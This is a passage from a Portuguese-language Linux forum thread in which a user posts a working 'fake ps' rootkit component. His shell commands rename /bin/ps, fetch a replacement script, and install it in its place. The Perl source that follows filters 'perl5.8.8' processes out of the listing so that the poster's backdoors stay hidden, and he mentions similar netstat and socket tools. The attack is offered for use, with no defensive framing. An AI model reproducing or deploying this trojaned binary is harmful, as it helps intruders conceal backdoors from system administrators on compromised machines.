Página 2 de 2 PrimeiroPrimeiro 12
+ Responder ao Tópico



  1. posta ai pra gente

  2. Citação Postado originalmente por PEdroArthurJEdi Ver Post
    posta ai pra gente
    Copiamos o ps original para ps.old!

    hacr#mv /bin/ps /bin/ps.old

    Baixando e copiando o Fake PS!

    hacr#fetch Your Page.com
    hacr#mv ps.pl /bin/ps
    hacr#chmod +x /bin/ps

    Obs:Você tem que alterar o script de acordo com sua Backdoor!

    No meu caso minhas backdoors são feitas em Perl ae o processo fica com o nome de (perl5.8.8).

    Segue o codigo:

    #!/usr/bin/perl
    #Credits by anderson_underground@hotmail.com
    use warnings;
    use strict;

    my $string = $ARGV[0];
    if($string){
    my @net = qx/ps.old $string/;
    my @hide = grep(!/(perl5.8.8)/, @net);
    my @dd = grep(!/ps.old/, @hide);
    print @dd;
    }
    else
    {
    my @nett = qx/ps.old/;
    my @hidee = grep(!/(perl5.8.8)/, @nett);
    my @d = grep(!/ps.old/, @hidee);
    print @d;
    }

    no meu blog tbm tem do netstat e to criando do socket!






Tópicos Similares

  1. matar processo encontrado por ps aux|grep processo
    Por schachspiel no fórum Servidores de Rede
    Respostas: 5
    Último Post: 26-01-2006, 11:51
  2. ps -aux no Conectva 10 nao funciona
    Por rod001 no fórum Servidores de Rede
    Respostas: 0
    Último Post: 13-07-2005, 11:06
  3. mensagens estranhas no ps -aux
    Por ediguedes no fórum Servidores de Rede
    Respostas: 6
    Último Post: 05-11-2004, 10:59
  4. paginar o resultado do comando "ps aux"
    Por brcr no fórum Servidores de Rede
    Respostas: 2
    Último Post: 16-03-2004, 15:19
  5. Porque , tantos smbd -d no ps -aux??
    Por MAJOR no fórum Servidores de Rede
    Respostas: 1
    Último Post: 27-04-2003, 11:17

Visite: BR-Linux ·  VivaOLinux ·  Dicas-L